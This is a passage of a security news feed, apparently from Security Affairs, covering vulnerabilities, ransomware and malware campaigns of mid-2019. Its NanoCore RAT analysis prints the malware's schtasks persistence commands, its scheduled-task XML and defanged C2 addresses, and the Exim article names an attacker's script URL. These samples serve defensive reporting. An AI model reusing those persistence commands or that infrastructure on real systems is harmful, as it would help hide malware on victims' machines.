Mozilla credited the researcher Luis Merino of X41 D-Sec for the discovery of the above flaws. The vulnerabilities affect the implementation of iCal functions, they could be used to cause a crash of the system when processing specially crafted email messages.

The expert pointed out that the flaws cannot be triggered via email in Thunderbird because the scripting is disabled when reading mail. The issue could be exploitable in browser or browser-like contexts.

The good news is Mozilla is not aware of any attack exploiting the flaws in the wild.

Pierluigi Paganini

(SecurityAffairs – Thunderbird, hacking)

The post Mozilla addressed flaws in Thunderbird that allow code execution appeared first on Security Affairs.

French authorities released the PyLocky decryptor for versions 1 and 2

Good news for the victims of the pyLocky Ransomware versions 1 and 2, French authorities have released the pyLocky decryptor to decrypt the files for free.

French authorities have released a decryptor for pyLocky Ransomware versions 1 and 2. The decryptor allows victims to decrypt their files for free. It was developed in collaboration between French law enforcement, the French Homeland Security Information Technology, and Systems Service, along with independent and volunteer researchers.

“PyLocky is very active in France, both within the professional environment (SMEs, large businesses, associations, etc.) as well as at home. This tool is a result of a collaborative Among the agencies of the french Ministry of Interior, Including the first Brigade of fraud investigations in information technology  (BEFTI) of the Regional Directorate of the Judicial Police of Paris , on the of technical elements gathered during its investigations and collaboration with volunteer researchers.” reads the post published by the French Ministry of Interior states it is more active in Europe.

“Those elements allowed the Homeland Security Information Technology and Systems Service ST (SI) ², part of the National Gendarmerie , to create that software.”

French Ministry of Interior pointed out that the ransomware hit many people in Europe, especially SMBs, large businesses, associations.

The pyLocky decryptor allows to decrypt file for version 1 (filenames having the .lockedfile or .lockymap extensions) and version 2 ( extensions .locky).

pyLocky Decryptor

The pyLocky Decryptor could be downloaded from the following link:

https://www.cybermalveillance.gouv.fr/wp-content/uploads/2019/02/PyLocky_Decryptor_V1_V2.zip

The decryptor has as pre-requisite the installation of the Java Runtime.

“This software decrypts the encryption of files with the extension .lockedfile or .lockymap and version 2 (encrypted files with the .locky extension) of PyLocky.” continues the report. “It requires a computer running the operating system Microsoft Windows 7 or higher and the execution environment Java JRE (Java Runtime Environment) version 8.”

The malware researcher Michael Gillespie analyzed the decryptor and noticed the presence of 2 hardcoded private RSA keys that were likely obtained by French police from the access to the C2 server hosted on the Tor network.

Let me remind you that the decryptor doesn’t clean the infected systems.

Pierluigi Paganini

(SecurityAffairs – pyLocky Decryptor, malware)

The post French authorities released the PyLocky decryptor for versions 1 and 2 appeared first on Security Affairs.

Dissecting NanoCore Crimeware Attack Chain

The Cybaze-Yoroi ZLab analyzed a new sample of Nanocore Remote Administrator Tools (RAT) using a Delphi wrapper to protect its code.

Introduction

Historically, cyber-criminals adopted one or more layers of encryption and obfuscation to lower their footprint and avoid detection. The usage of cryptors and packers has become a commodity in the contemporary malware landscape, providing the so-called “FUD” (Fully UnDetectable) capabilities to malicious code and allowing the outsourcing of the payload hiding.

The CSDC monitoring operations spotted a particular sample of the famous Nanocore Remote Administrator Tools (RAT). In this specific case, a Delphi wrapper was used to protect the RAT. Thus, Cybaze-Yoroi ZLab decided to analyze this threat.

Technical Analysis

Nanocore RAT is a “general purpose” malware with specific client factories available to everyone and easily accessible. During our cyber-defense activities we discovered attack attempts against Italian companies operating in the Luxury sector. For instance, we intercepted malicious email claiming to come from a well known Italian Bank and then we started to analyze it.

Figure 1: Part of initial e-mail

The attachment looks like a 7z archive file containing a valid PE file with Adobe Acrobat icon. Trivial trick used to lure ingenuous users to believe that it is a legit PDF file. However, it contains a PE executable:

Hash8274313b5b1e941a67b54e9f311094f2f56a3afe97820ad03560d9885a60b71b
ThreatNanocore RAT wrapper
Brief DescriptionDelphi Language Wrapper for Nanocore RAT
Ssdeep24576:FZ8elMYdWD7yWQ5/It6OxPtNHApfqGwcblA8:FyYEvt6OxPTHAgJcblA8
Icon

Table 1: Static info about Nanocore dropper/NanoCore RAT

Then we extracted some static information on the sample:

Figure 2: Information about “trasferimento.exe” dropper/NanoCore RAT

The sample was compiled with “BobSoft Mini Delphi” compiler and two characteristics are significant: the first one is the high level of entropy, this leads us to think that the sample was somehow packed; the second one is the absolutely fake compilation timestamp of the executable.

Executing the malware, we notice the presence of some checks performed by the malware in order to evade analysis boxes.

Figure 3: Processes checked by malware

In the above figure, are shown some processes checked by the malware. This action is performed through the usage of the classical Win32 API calls “CreateToolhelp32Snapshot” and “Process32Next”.

Figure 4: API calls to check open tools

If no one of the checked processes is active, the malware can proceed with the real infection: it writes the real payload of Nanocore RAT in the “%TEMP%” folder.

Figure 5: NanoCore payload written by the loader and relative API calls

The interesting thing is the payload, that is further loaded into memory, is merely embedded inside a resource without any encryption or obfuscation.

Figure 6: Comparison between payload embedded in resource of “trasferimento.exe” sample and “non.exe” written in %TEMP% folder

As shown in the above figure, the “trasferimento.exe” Delphi wrapper has got a lot of embedded resources (as visible on the left), and one of them contains the entire Nanocore RAT payload. On the right, there is a diff analysis of the resource named “2035” and the actual payload triggered on the victim machine. The resource “2035” has a sort of header (highlighted in yellow, on the left upper corner), which contains the name of the payload to implant on the machine “non.exe”. The succeeding piece of code is identical, without any protection. The “trasferimento.exe” component runs a scheduled task in order to guarantee its persistence.

Figure 7: Task-scheduler set by malware

At this point the malware creates a xml file with a pseudo-random name containing the configuration for its persistence on the machine. After creating this file, the malware spawns the “non.exe” process and then re-spawn itself through the following command lines.

schtasks.exe” /create /f /tn “IMAP Subsystem” /xml “C:\Users\admin\AppData\Local\Temp\tmpC5A7.tmp”schtasks.exe” /create /f /tn “IMAP Subsystem” /xml “C:\Users\admin\AppData\Local\Temp\tmpCB59.tmp”

The body of the xml configuration file is the following:

<?xml version=”1.0″ encoding=”UTF-16″?><Task version=”1.2″ xmlns=”http://schemas.microsoft.com/windows/2004/02/mit/task”>  <RegistrationInfo />  <Triggers />  <Principals>    <Principal id=”Author”>      <LogonType>InteractiveToken</LogonType>      <RunLevel>HighestAvailable</RunLevel>    </Principal>  </Principals>  <Settings>    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>    <AllowHardTerminate>true</AllowHardTerminate>    <StartWhenAvailable>false</StartWhenAvailable>    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>    <IdleSettings>      <StopOnIdleEnd>false</StopOnIdleEnd>      <RestartOnIdle>false</RestartOnIdle>    </IdleSettings>    <AllowStartOnDemand>true</AllowStartOnDemand>    <Enabled>true</Enabled>    <Hidden>false</Hidden>    <RunOnlyIfIdle>false</RunOnlyIfIdle>    <WakeToRun>false</WakeToRun>    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>    <Priority>4</Priority>  </Settings>  <Actions Context=”Author”>    <Exec>      <Command>”C:\Users\admin\Desktop\trasferimento.exe”</Command>      <Arguments>$(Arg0)</Arguments>    </Exec>  </Actions></Task>

The difference between the two scheduled tasks is the fact that one references “trasferimento.exe” process and the other one references “non.exe” process. It seems to be a sort of a survival mechanism in which both the processes work and keep the infection alive.

Figure 8: Details about set task scheduler

These two processes contact two different C2s. During the analysis one of them (185.244.31.[50)  was down and the other one (79.134.225[.41) continues to work.

Figure 9: Communication with two different C2

NanoCore Client

Hash52d73eee176a2ff30af7e386809b94ef1c4918f131f8de1e2b66915ab8cc3790
ThreatNanocore RAT
Brief DescriptionNanoCore RAT client
Ssdeep6144:MLV6Bta6dtJmakIM5u8GL+1WUQ52F+/8Ej4eg:MLV6BtpmkqGLUcQsEEj4h

Table 2: Information about “non.exe” NanoCore RAT

At this point, let’s start to analyze the “non.exe” file which is the Nanocore RAT Client, even this one is compiled in .NET language.

Figure 10: Other information about “non.exe” NanoCore RAT and relative compiled language

The de-compiled code is quite obfuscated and encrypted with some custom routines.

Figure 11: Version of NanoCore Client

The real nature of the payload is revealed after few steps of debugging, we extracted also the current version: 1.2.2.0, as highlighted in the red square. Going ahead with debugging, we found  a recurrent routine used to decrypt RAT’s static strings and the malware configuration too:

Figure 12: Decryption routine to extract the configuration file

Like other crimeware, also this one leverages encrypted configuration only decrypted during the malware execution. Interestingly, the extracted configuration does not include persistence, which is however guaranteed by the scheduled task handled by the external wrapper.

Figure 13: Configuration information of the RAT client

As we can see from the above figure, this client has some interesting enabled features, like the capability to bypass the UAC control, or prevent the system to go to sleep. Moreover, the primary and backup C2 are the same and the solution of the backup C2 is guaranteed through the other “trasferimento.exe” RAT mode process.

Conclusion

Nowadays a lot of cyber criminals don’t strive to write malware from scratch because there already are a vastity of public tools suitable for this need. From the attacker point of view, the problem about the usage of these tools is the fact they sooner or later will be recognized by the Anti-Virus engines.

Therefore, attackers adopt other technologies like packers and obfuscators, many time publicly available too, or write down custom loaders to hide their espionage tools, keeping them running into victim machines for a long time, silently observing their targets and awaiting the right time to act their criminal plans.

Technical details, including IoCs and Yara Rules, are available in the analysis published in the Yoroi blog.

https://blog.yoroi.company/research/dissecting-nanocore-crimeware-attack-chain/

Pierluigi Paganini

(SecurityAffairs – NanoCore, malware)

The post Dissecting NanoCore Crimeware Attack Chain appeared first on Security Affairs.

Yubico is replacing for free YubiKey FIPS devices due to security weakness

Yubico is replacing YubiKey FIPS security keys due to a serious flaw that makes cryptographic operations easier to crack under specific conditions.

Yubico is replacing YubiKey FIPS security keys due to a serious issue that flaw that makes it easier to crack RSA keys and ECDSA signatures generated on these devices.

The security advisory published by the company states that the issue impacts YubiKey series devices running versions 4.4.2 and 4.4.4 of the firmware. The weakness impacts PIV smart card applications, Universal 2nd Factor (U2F) authentication, OATH one-time passwords, and OpenPGP. Nano FIPS, C FIPS and C Nano FIPS devices are also impacted by the weakness.

“An issue exists in the YubiKey FIPS Series devices with firmware version 4.4.2 or 4.4.4 (there is no released firmware version 4.4.3) where random values leveraged in some YubiKey FIPS applications contain reduced randomness for the first operations performed after YubiKey FIPS power-up,” reads the advisory published by Yubico.

“The issue only affects certain use cases and scenarios. YubiKey FIPS applications utilizing ECDSA are at higher risk than other use cases.”

Some YubiKey FIPS applications leverage on ransom values that contain reduced randomness for the first operations performed after devices power-up.

“The buffer holding random values contains some predictable content left over from the FIPS power-up self-tests which could affect cryptographic operations which require random data until the predictable content is exhausted,” continues the advisory.

Yubico discovered the flaw in March and addressed it with the release of the firmware version 4.4.5 that was certified at the end of April.

At the time, there is no news of attacks exploiting the issue in the wild.

Yubico is contacting its customers to inform them of the free device replacement. The company said that most of the affected security keys have already been replaced or are in the process of being replaced.

People who bought their devices from a reseller should contact them and ask for the drives replacement.

Pierluigi Paganini

(SecurityAffairs – Yubico, hacking)

The post Yubico is replacing for free YubiKey FIPS devices due to security weakness appeared first on Security Affairs.

Millions of Exim mail servers are currently under attack

Hackers are targeting millions of mail servers running vulnerable Exim mail transfer agent (MTA) versions, threat actors leverage the CVE-2019-10149 flaw.

Millions of mail servers running vulnerable Exim mail transfer agent (MTA) versions are under attack, threat actors are exploiting the CVE-2019-10149 flaw to take over them.

A critical vulnerability affects versions 4.87 to 4.91 of the Exim mail transfer agent (MTA) software. The flaw could be exploited by unauthenticated remote attackers to execute arbitrary commands on mail servers for some non-default server configurations.

The CVE-2019-10149 issue resides in the deliver_message() function in /src/deliver.c and it is caused by the improper validation of recipient addresses. The issue could lead to remote code execution with root privileges on the mail server.

The flaw is easily exploitable by a local and a remote attacker in certain non-default configurations, experts believe that threat actors will start using it in attacks in the wild.

The CVE-2019-10149 flaw was addressed the Exim’s development team with the release of version 4.92 in February. Unfortunately, a large number of operating systems are still affected by the vulnerability.

Querying Shodan for vulnerable versions of Exim it is possible to find 3,655,524 installs most of them in the United States (1,984,5538).
Searching for patched Exim installs running the 4.92 release we can find 1,795,332 systems.

Exim

CVE-2019-10149, which was first discovered on June 5, is now being used as the vulnerability for a widespread campaign to attack exim servers and propagate across the Internet.” reads a blog post published by Cybereason..

“We are aware of an initial wave of attacks as described by Freddie Leeman on June 9, 2019. The first hacker group began pushing exploits from a C2 server located on the clear web. A second round of attacks by a different attacker are being analyzed by the Nocturnus team.”

Attackers are scanning the internet for vulnerable mail servers then when they will be compromised the initially deployed script will download a second script designed to check if OpenSSH is installed on the compromised machine.

In case OpenSSH is not present, it will install it and start it to gain root logins via SSH using a private/public RSA key for authentication.

Experts also observed another campaign carried out by a second group of attackers that is also targeting Exim servers.

The second stream of attacks was spotted by Freddie Leeman on June 9, in this wave of attacks attackers were delivering the script used to exploit vulnerable Exim servers from 173[.]212[.]214[.]137/s.

“During the subsequent days, this group evolved its attacks, changing the type of malware and scripts it would download on infected hosts; a sign that they were still experimenting with their own attack chain and hadn’t settled on a particular exploit method and final goal.” reported ZDnet.

The attackers behind this second stream used multiple variants and continuously changed the scripts.

Pierluigi Paganini

(SecurityAffairs – Exim, hacking)

The post Millions of Exim mail servers are currently under attack appeared first on Security Affairs.

WAGO Industrial Switches affected by multiple flaws

A security expert at SEC Consult discovered that some WAGO industrial managed switches are affected by several serious vulnerabilities.

A security researcher at consulting company SEC Consult discovered several vulnerabilities in some models of WAGO industrial switches.

The vulnerabilities affect WAGO industrial switches 852-303, 852-1305 and 852-1505 models. The company has already fixed the issues with the release of firmware versions 1.2.2.S0, 1.1.6.S0 and 1.1.5.S0, respectively.

“The industrial managed switch series 852 from WAGO is affected by multiple vulnerabilities such as old software components embedded in the firmware. Furthermore, hardcoded password hashes and credentials were also found by doing an automated scan with IoT Inspector.” reads the security advisory. “Two vulnerabilities (CVE-2017-16544 and CVE-2015-0235) were verified by emulating the device with the MEDUSA scaleable firmware runtime. The validity of the password hashes and the embedded keys were also verified by emulating the device.

One of the most severe issues is related to the presence of hardcoded credentials that can be used to connect the devices via Telnet and SSH.

“Hardcoded Credentials (CVE-2019-12550) – The device contains hardcoded users and passwords which can be used to login via SSH and Telnet.” continues the advisory.

The expert also found hardcoded private keys for the SSH daemon in the device’s firmware. An attacker can use them to carry out man-in-the-middle (MitM) attacks against the Dropbear SSH daemon without the victim noticing any fingerprint changes.

“The device contains hardcoded private keys for the SSH daemon. The fingerprint of the SSH host key from the corresponding SSH daemon matches to the embedded private key.” states the advisory.

SEC Consult also discovered that WAGO industrial switches use outdated versions of the BusyBox UNIX toolkit and the GNU C Library (glibc). Both libraries are affected by known vulnerabilities, some of which rated as critical.

Experts suggest restricting network access to the device and SSH server in order to protect the system. The good news is that affected switches are not exposed online.

The German VDE CERT has published an advisory to warn of the flaws in the WAGO devices.

Pierluigi Paganini

(SecurityAffairs – Wago industrial switches, hacking)

The post WAGO Industrial Switches affected by multiple flaws appeared first on Security Affairs.

Ransomware paralyzed production for at least a week at ASCO factories

Malware infections could be devastating for production environments, a ransomware infection halts production operations for days at airplane parts manufacturer ASCO.

ASCO, is of the world’s largest manufacturers of aerospace components

The company has offices and production plants in Belgium, Canada, Germany the US, Brasil, and France. ASCO provides components to Airbus, Boeing, Bombardier Aerospace, and Lockheed Martin.

A ransomware attack has paralyzed the production in ASCO plants across several countries worldwide. The attack reportedly started on Friday and at the time of writing the current extent of the internal damage is still unknown.

After the incident, nearly 1,000 employees out of 1400 were sent home for the entire week, on paid leave.

ASCO

As a result of having IT systems crippled by the ransomware infection, the company has sent home approximately 1,000 of its 1,400 workers.

“Employees of the Asco company in Zaventem are technically unemployed for a few days because the company’s servers have been hacked. The company confirms that it has been hit by a cyber attack since Friday. A complaint has been submitted to the police.” states VRT (Flemish Radio and Television Broadcasting Organisation). “The public prosecutor says there are traces of “ransomware” found on the computers, with hackers asking ransom to re-release the blocked computers.

The company reported the incident to the local authorities and hired third-party experts to investigate the attack.

“We have informed all competent authorities in this area of ​​this cyber attack and have brought in external experts to solve the problem,” says HR director Vicky Welvaert. “We are currently working on it with all our might.” Welvaert does not want to comment on whether the problem is now under control or from when the business activities will be restarted.

According to the media, the ransomware first hit the Zaventem plant in Belgium, but immediately after ASCO also shut down for precaution production factories in Germany, Canada, and the US.

At the time is not clear if the company decided to pay the ransom to restore its systems rapidly or simply restore its backups.

Despite ASCO should be a privileged target for cyber spies, its representatives told The Brussels Times that there is currently no evidence of theft of information.

“The company also notified the authorities, and told the paper there is currently no evidence of the theft of information, but that it is taking the situation very seriously.” reported The Brussels Times.

“Although ransomware attacks are usually only about money, a company like Asco, which has connections in the defence sector, could also be a targe”

Pierluigi Paganini

(SecurityAffairs – ASCO, ransomware)

The post Ransomware paralyzed production for at least a week at ASCO factories appeared first on Security Affairs.

Massive DDos attack hit Telegram, company says most of junk traffic is from China

Encrypted messaging service Telegram was hit by a major DDoS attack apparently originated from China, likely linked to the ongoing political unrest in Hong Kong.

Telegram was used by protesters in Hong Kong to evade surveillance and coordinate their demonstrations against China that would allow extraditions from the country to the mainland.

The country is facing the worst political crisis ùsince its 1997 handover from Britain to China.

While protesters in the country are involved in violent demonstrations repressed by the police with tear gas and rubber bullets.

At the same time, Telegram suffered a massive Distributed Denial of Service (DDoS) attack, users mainly in South and North America were affected by a significant outage, anyway, problems were observed by other users worldwide.

Hackers used a huge botnet to generate the traffic that made Telegram servers inaccessible.

However, users in other locations were also affected, as some people in Australia reported problems with loading video content.

telegram down

According to Pavel Durov, Telegram’s CEO, most of the junk traffic was originated from China.

Telegram constantly updated its users via Twitter, at the time it has restored an ordinary operation.

Telegram is one of the most popular encrypted instant messaging apps that currently has over 200 million monthly active users.

Telegram is currently blocked in China by country’s Great Firewall. Many people fear that the government of Beijing would increase influence on Hong Kong.

“The city’s special status under its handover agreement allows freedoms unseen in mainland China, but many fear they are under threat as Beijing exerts increasing influence on Hong Kong.” states the AFP.

“The current protests were sparked by fears that the proposed law would allow extraditions to China and leave people exposed to the mainland’s politicised and opaque justice system.”

Pierluigi Paganini

(SecurityAffairs – Hong Kong, DDoS)

The post Massive DDos attack hit Telegram, company says most of junk traffic is from China appeared first on Security Affairs.

Flaw in Evernote Web Clipper for Chrome extension allows stealing data

Security experts discovered a vulnerability in the popular Evernote Web Clipper for Chrome can be exploited to steal sensitive data from sites visited by users.

Security experts at browser security firm Guardio discovered a critical universal cross-site scripting (XSS) vulnerability in the Evernote Web Clipper for Chrome.

“In May 2019 Guardio’s research team has discovered a critical vulnerability in Evernote Web Clipper for Chrome.” reads a blog post published by Guardio. “A logical coding error made it is possible to break domain-isolation mechanisms and execute code on behalf of the user – granting access to sensitive user information not limited to Evernote’s domain.”

The vulnerability, tracked as CVE-2019-12592, could be exploited by attackers operating malicious websites to bypass the browser’s same-origin policy (SOP) and execute arbitrary code on the victim’s behalf.

The Evernote Web Clipper extension for Chrome allows users to easily save online content to Evernote, including web pages, articles, images, text, and emails. The popular extension has over 4.6 million users.

The attack scenario sees hackers tricking victims into visiting specially crafted websites that load hidden iframes.

The vulnerability discovered by the experts in the Evernote extension allows an attacker to inject a malicious payload into all iframe contexts and steal credentials, cookies, and other data.

Researchers published a video PoC of the attacks that shows how hackers can steal a user’s Facebook information and data on PayPal transactions.

The researchers also provided a description of a Proof-of-Concept (PoC) attacks to steal sensitive data from an unsuspecting user, below the attack scenario:

  1. User navigates to the attacker’s malicious website (e.g. via social media, email, a compromised blog comment, etc.).
  2. Malicious website silently loads hidden, legitimate iframe tags (link) of targeted websites.
  3. The exploit is triggered by the malicious website and causes Evernote’s internal infrastructure to inject an attacker controlled payload into all iframes contexts.
  4. Injected payload is customized for each targeted website, able to steal cookies, credentials, private information, perform actions as the user and more.
Evernote Web Clipper for Chrome

Below the timeline of the flaw:

  • May 27th, 2019 – Initial disclosure.
  • May 28th, 2019 – Follow-up email.
  • May 28th, 2019 – Issue confirmed and classified as a vulnerability.
  • May 29th, 2019 – Credited on Evernote’s Security Page (link).
  • May 31st, 2019 – Evernote Web Clipper 7.11.1 released.
  • June 4th, 2019 – Fix confirmed.

Pierluigi Paganini

(SecurityAffairs – Evernote Web Clipper for Chrome, hacking)

The post Flaw in Evernote Web Clipper for Chrome extension allows stealing data appeared first on Security Affairs.

Google expert disclosed details of an unpatched flaw in SymCrypt library

Tavis Ormandy, a white hat hacker Google Project Zero announced to have found a zero-day flaw in the SymCrypt cryptographic library of Microsoft’s operating system.

The recently released Microsoft Patch Tuesday security updates for June 2019 failed to address a flaw in SymCrypt, a core cryptographic function library currently used by Windows. The flaw could be exploited by malicious programs trigger a denial of service condition by interrupting the encryption service for other programs.

The vulnerability was found by white hat hacker Tavis Ormandy from Google Project Zero. According to the Google 90-days disclosure policy, Ormandy publicly released details and proof-of-concept of the vulnerability.

Ormandy privately reported the flaw to Microsoft in March 2019, but the tech giant failed into fixing it after 90 days.

The unpatched vulnerability affects Windows 8 servers and above.

According to Microsoft, SymCrypt is the primary library for implementing symmetric cryptographic algorithms in Windows 8, it also implements asymmetric cryptographic algorithms starting with Windows 10 version 1703.

Ormandy discovered that it is possible to trigger the flaw to cause an infinite loop when making specific cryptographic operations.

“There’s a bug in the SymCrypt multi-precision arithmetic routines that can cause an infinite loop when calculating the modular inverse on specific bit patterns with bcryptprimitives!SymCryptFdefModInvGeneric.” wrote the expert.

“I’ve been able to construct an X.509 certificate that triggers the bug. I’ve found that embedding the certificate in an S/MIME message, authenticode signature, schannel connection, and so on will effectively DoS any windows server (e.g. ipsec, iis, exchange, etc) and (depending on the context) may require the machine to be rebooted. Obviously, lots of software that processes untrusted content (like antivirus) call these routines on untrusted data, and this will cause them to deadlock.”

The white hat hacker used a specially crafted X.509 digital certificate to trigger the flaw, he explained that any application running on the system that processes the certificate can trigger the vulnerability.

Specially crafted certificates could be provided in multiple ways, for example in digitally signed and encrypted messages via the S/MIME protocol.

Ormandy explained that is some cases it would be necessary to reboot the vulnerable machine to return in a normal state.

Microsoft Security Response Center (MSRC) told the Google expert that the company will not able to provide a security patch before next month.

Pierluigi Paganini

(SecurityAffairs – SymCrypt, hacking)

The post Google expert disclosed details of an unpatched flaw in SymCrypt library appeared first on Security Affairs.

FIN8 Hacking Group is back with an improved version of the ShellTea Backdoor

After two years of silence, FIN8 group is back and carried out a new campaign against the hotel-entertainment industry employing the ShellTea/PunchBuggy backdoor.

Two years later after the last report, FIN8 group is back and carried out a new campaign against the hotel-entertainment industry using an improved version of the ShellTea/PunchBuggy backdoor.

The last time security experts documented the FIN8’s activities was in 2016 and 2017. At the time, FireEye and root9B published detailed reports about a series of attacks targeting the retail sector.

FireEye documented obfuscation techniques used by the group in June 2017 and the involvement of PUNCHTRACK POS-scraping malware.

The ShellTea backdoor was analyzed by researchers Root9b in June 2017, the malware was used by threat actors to deliver the PoC malware.

Now experts at Morphisec revealed to have observed a new campaign attributed to the FIN8 group that targeted entities in the hotel-entertainment industry.

“During the period of March to May 2019, Morphisec Labs observed a new, highly sophisticated variant of the ShellTea / PunchBuggy backdoor malware that attempted to infiltrate a number of machines within the network of a customer in the hotel-entertainment industry.” reads the analysis published by Morphisec. “It is believed that the malware was deployed as a result of several phishing attempts.”

Experts believe the attackers launched phishing attacks in the attempt of delivering PoS malware.

Researchers also gathered evidence of overlap between FIN8 and FIN7 attacks, even if the two groups are considered separated.

“Given the nature of the industry targeted in the attack uncovered by Morphisec, we assume that this was also an attempted POS attack.” continues the analysis. “In this report, we investigate this latest variant of ShellTea, together with the artifacts it downloaded after the Morphisec Labs team detonated a sample in a safe environment.”

The attack chain starts with a fileless dropper using PowerShell code executed from registry keys and leading to ShellTea.

The ShellTea attempt to evade detection by checking the presence of virtualized environments and standard analysis tools. The malicious code uses a hacking algorithm for most of its functions, the algorithm is similar to the one implemented for previous ShellTea version.

ShellTea is then injected into Explorer, it communicates with the C2 over HTTPs and supports various commands, such as loading and executing a delivered executable, creating/executing processes, executing any PowerShell command using downloaded native Empire ReflectivePicker, and of course downloading and executing a POS malware.

Attackers use the PowerShell script to collect information on the user and the network, then sends Gzipped data to the C2 and delete it.

Experts pointed out that attackers are constantly innovating their arsenal, their new techniques are able to easily evade standard POS defenses.

“The hospitality industry, and particularly their POS networks, continues to be one of the industries most targeted by cybercrime groups. In addition to this attack by FIN8,we’ve seen multiple attacks by FIN6FIN7 and others.” concludes Morphisec.

Many POS networks are running on the POS version of Window 7, making them more susceptible to vulnerabilities. What’s more, attackers know that many POS systems run with only rudimentary security as traditional antivirus is too heavy and requires constant updating that can interfere with system availability.” ” As we see here, attack syndicates are constantly innovating and learn from their mistakes – the numerous improvements and bug fixes from the previous version of ShellTea are evident. The techniques implemented can easily evade standard POS defenses. “

Pierluigi Paganini

(SecurityAffairs – FIN8, hacking)

The post FIN8 Hacking Group is back with an improved version of the ShellTea Backdoor appeared first on Security Affairs.

Radiohead releases a trove of stolen music in response to the hack

The English rock Radiohead released 18-hour trove of private recordings from their 1997 album “OK Computer” in response to the recent hack.

The alternative rock band Radiohead released an 18-hour trove of private recordings from their 1997 album “OK Computer” after being hacked by crooks that demanded a ransom of $150,000 for the music.

Radiohead uploaded 1.8-gigabyte of recording, live performances, and some unpublished songs on their website (radiohead.bandcamp.com).

Radiohead

The hackers’ dream of making money stealing the music vanished, now anyone can access them for free.

The group is also offering for sale downloads of an album of the 18 hacked MiniDiscs for £18 and donating the proceeds to the Extinction Rebellion environmental campaign group. That’s amazing guys!

“We’ve been hacked,” explained frontman Thom Yorke.

“It’s not v interesting,” he added. “As it’s out there it may as well be out there, until we all get bored and move on.”

Below the tweet published by the group guitarist, Jonny Greenwood that confirmed the hack occurred last week.

“Someone stole Thom’s minidisk archive from around the time of OK Computer, and reportedly demanded $150,000 on threat of releasing it,” Greenwood wrote.

“So instead of complaining — much — or ignoring it, we’re releasing all 18 hours on Bandcamp in aid of Extinction Rebellion,”.

Immediately after the hack, the Reddit user ‘ u/santicol’ revealed that someone claiming to have the stolen music attempted to offer it to a “well known leaker” and offered them previews of the tracks.

“The user described how someone claiming to have the archive came in contact with a “well-known leaker” and offered them previews of the tracks.” reported the AFP press.

“They were asking upwards of $150,000 for the entire set, at $800 per studio track and $50 per live track,” added the Reddit user.

“The leaker seems to be well known in some spaces and has a history of trading in very rare/high profile material,”.

Pierluigi Paganini

(SecurityAffairs – Radiohead, hacking)

The post Radiohead releases a trove of stolen music in response to the hack appeared first on Security Affairs.

RAMBleed, a new Side-Channel Attack that allows stealing sensitive data

Security researchers disclosed the details of RAMBleed, a new type of side-channel attack on DRAM that can allow stealing sensitive data from a memory.

A team of academics from several universities has disclosed the details a new type of side-channel attack on dynamic random-access memory (DRAM), dubbed RAMBleed. The RAMBleed issue, tracked as CVE-2019-0174, could be used by attackers to potentially obtain from the system’s memory sensitive data.

RAMBleed is based on a previous side channel called Rowhammer, which enables an attacker to flip bits in the memory space of other processes. We show in our paper that an attacker, by observing Rowhammer-induced bit flips in her own memory, can deduce the values in nearby DRAM rows. Thus, RAMBleed shifts Rowhammer from being a threat not only to integrity, but confidentiality as well.” wrote the experts.

rambleed

RAMBleed is based on the Rowhammer attack technique devised by researchers at the Google Project Zero team back in 2015.

To better understand the Rowhammer flaw, let’s remember that a DDR memory is arranged in an array of rows and columns. Blocks of memory are assigned to various services and applications. To avoid that an application accesses the memory space reserved by another application, it implements a “sandbox” protection mechanism.

Bit flipping technique caused by the Rowhammer problems could be exploited to evade the sendbox.

The researchers at Google Project Zero started from a previous study conducted by Yoongu Kim titled “Flipping Bits in Memory Without Accessing Them: An Experimental Study of DRAM Disturbance Errors”. 

In modern chip, DRAMs have a high capacity and it is hard to prevent DRAM cells from interacting electrically with each other.

The Project Zero hacking elite team demonstrated two proof-of-concept exploits that allowed them to control several x86 computers running Linux, according to the experts the attacks could work with other operating systems as well.

Now researchers from the University of Michigan, Graz University of Technology and University of Adelaide demonstrated that an attacker with limited privileges can use a Rowhammer attack to deduce bits in nearby rows. This means that an attacker could obtain data associated with other processes and the kernel.

Previous Rowhammer attack techniques were based on write side-channels, attackers leverage persistent bit flips that can be mitigated by error-correcting code (ECC) memory. RAMBleed is different because it relies on a read side-channel and it does not require persistent bit flips.

“It is widely assumed however, that bit flips within the adversary’s own private memory have no security implications, as the attacker can already modify its private memory via regular write operations. We demonstrate that this assumption is incorrect, by employing Rowhammer as a read side channel.” reads the research paper. “More specifically, we show how an unprivileged attacker can exploit the data dependence between Rowhammer induced bit flips and the bits in nearby rows to deduce these bits, including values belonging to other processes and the kernel.”

The researchers developed new memory massaging techniques to carefully place the victim’s secret data in the rows above and below the attacker’s memory row, In this was they caused the bit flips in the attacker’s rows to depend on the values of the victim’s secret data.

“The attacker can then use Rowhammer to induce bit flips in her own memory, thereby leaking the victim’s secret data,” added the researchers.

The experts RAMBleed demonstrated the RAMBleed attack by targeting OpenSSH and leaking a 2048-bit RSA key, of course it is just a possible target but the technique could be used to steal other potentially sensitive data.

RAMBleed is effective work against devices using DDR3 and DDR4 memory modules, but it potentially works with many other computers.

Experts suggest to upgrade memory modules to DDR4 with targeted row refresh (TRR) enabled, because it makes hard the exploitation of the flaw.

At the time there is no evidence that RAMBleed has been exploited in attacks in the wild.

Pierluigi Paganini

(SecurityAffairs – RAMBleed, hacking)

The post RAMBleed, a new Side-Channel Attack that allows stealing sensitive data appeared first on Security Affairs.

Microsoft Patch Tuesday security updates for June 2019 fix 88 flaws

Microsoft releases Patch Tuesday security updates for June 2019 that address 88 vulnerabilities in Windows OS and other products.

Microsoft Patch Tuesday security updates for June 2019 address 88 vulnerabilities in Windows OS and other products of the tech giant (Internet Explorer, Microsoft Edge browser, Microsoft Office and Services, ChakraCore, Skype for Business, Microsoft Lync, Microsoft Exchange Server, and Azure).

21 out of 88 flaws are rated as Critical in severity, 66 as Important, and only one of them rated as Moderate in severity.

Microsoft addressed four publicly exposed privilege escalation issues rated as important. None of these vulnerabilities was exploited in attacks in the wild.

The flaws were disclosed by the researcher SandboxEscaper over the past weeks, below the list of the issue:

One of the critical vulnerabilities fixed by Microsoft is a Windows Hyper-V Remote Code Execution issue tracked as CVE-2019-0620.

